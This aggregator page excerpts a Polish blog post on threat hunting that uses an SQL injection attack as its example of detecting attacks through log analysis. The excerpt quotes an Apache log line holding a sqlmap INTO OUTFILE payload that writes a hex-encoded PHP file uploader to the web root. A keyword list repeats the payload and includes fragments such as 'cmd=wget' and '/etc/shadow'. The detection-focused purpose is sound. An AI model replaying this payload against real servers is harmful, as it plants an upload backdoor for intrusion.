One Article Review
| Source |  RedTeam PL |
|---|---|
| Identifiant | 8618484 |
| Date de publication | 2024-12-01 16:50:18 (vue: 2024-12-01 16:08:32) |
| Titre | Aktywne wyszukiwanie zagrożeń na przykładzie ataku SQL injection |
| Texte | Threat hunting to aktywne wyszukiwanie zagrożeń, jest to swojego rodzaju proaktywna informatyka śledcza. Wyszukujemy zagrożenia zanim się wyeskalują, jesteśmy dzięki temu w stanie reagować w trakcie ataku albo niedługo po jego rozpoczęciu, zanim przykładowo dojdzie do wycieku istotnych informacji. Jak przykładowo może zostać to zrealizowane w przypadku ataku SQL injection (SQLi)? Ostatnio opublikowałem wpis "Eskalacja uprawnień z wykorzystaniem SUID", który jest niejako wprowadzeniem do tego wpisu, dlatego zachęcam do zapoznania się z nim. Na wstępie dodam tylko, że nasze środowisko testowe jest uruchomione na systemie Linux Ubuntu, ma to przede wszystkim znaczenie jeśli chodzi o lokalizację ścieżek itp. W tym przypadku powinny być zgodne z systemem Debian oraz innymi bazującymi na tej dystrybucji. Jeśli atakujący przeprowadzi następujący atak: Wykorzystanie podatności SQL injection Pobranie na serwer własnego oprogramowania Wykorzystanie go w eksploitacji oraz ostatecznie dodanie nowego użytkownika ...to mamy wystarczająco dużo elementów aby wykryć taki atak na różnych poziomach jego aktywności. W pierwszej kolejności możemy na przykład monitorować logi serwera HTTP pod kątem symptomów ataków, na przykład wyszukując ataki przy pomocy reguł oprogramowania PHP-IDS. Jedną z anomalii mogą być też długie zapytania, szczególnie jeśli zwracają kod 200 (OK): 10.13.1.169 - - [07/Aug/2017:11:22:59 +0100] "GET /sqli/index.php?sqli=1%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpuwujn.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20--%20oCxa HTTP/1.1" 200 367 "-" "sqlmap/1.0.8.2#dev (http://sqlmap.org)" Symptomami ataku SQLi mogą być słowa kluczowe specyficzne dla języka SQL, takie jak: SELECT, UNION, INSERT, UPDATE, DELETE, REPLACE, TRUNCATE Warto również skupić się na tych, które są wykorzystywane w wielokrokowych atakach i służących do przeprowadzania operacji na plikach, w logach po ataku przy pomocy sqlmap znajdziemy: OUTFILE, LOAD_FILE, DUMPFILE Jeśli więc przeprowadzimy proste doświadczenie i wykonamy zapytanie, które wysyła program sqlmap: mysql> SELECT * FROM foo WHERE |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | $dir=$ 7 9 = using wliczając +0100 /etc/mysql/mysql /etc/passwd /etc/shadow /sqli/index /sqli/tmpbwjqk /sqli/tmpulnyy /var/log/auth /var/log/mysql/mysql /var/www/tmpuwujn 07/aug/2017:11:22:59 07/aug/2017:11:24:17 07/aug/2017:11:24:23 07t10:22:59 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a 103 11:59 169 178 193 2#dev 200 200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a 2011 2017 20by 20chmod 20http 20into 20limit 20lines 20ocxa 20outfile 20terminated 20whoami 24path 292641z 292726z 292863z 2bx 2c1 2f10 2faz 2fbin 2fdownload 2ftest 2ftmpuwujn 2fusr 2fvar 2fwww 367 7 oraz wget/1 713 ;if aby adam adresy affected agent aktualnie aktywne aktywności albo analiza analizie analogicznie anomaliami anomalii antywirusowego apache aplikacja aplikacji różnych archiwum aspektem atak atak: atakach ataki ataku ataku sql atakujący ataków aug automatycznych bazie bazującymi bazy bazą być będzie cat celu chociażby chodzi cmd=path= cmd=wget cnf code conf connect ctime czasowej czasu czy czyli czym d/mysqld danych danych zostało data debian delete detekcja detekcji detekcję directory: dla dlatego documentroot serwera dodam dodanie dojdzie dostępnych doświadczenie drogą dumpfile dużo dwóch dyrektywie dystrybucji dzięki długie eksploitacji elementem elementy elementów eskalacja execution ext4 file find |
| Tags | |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.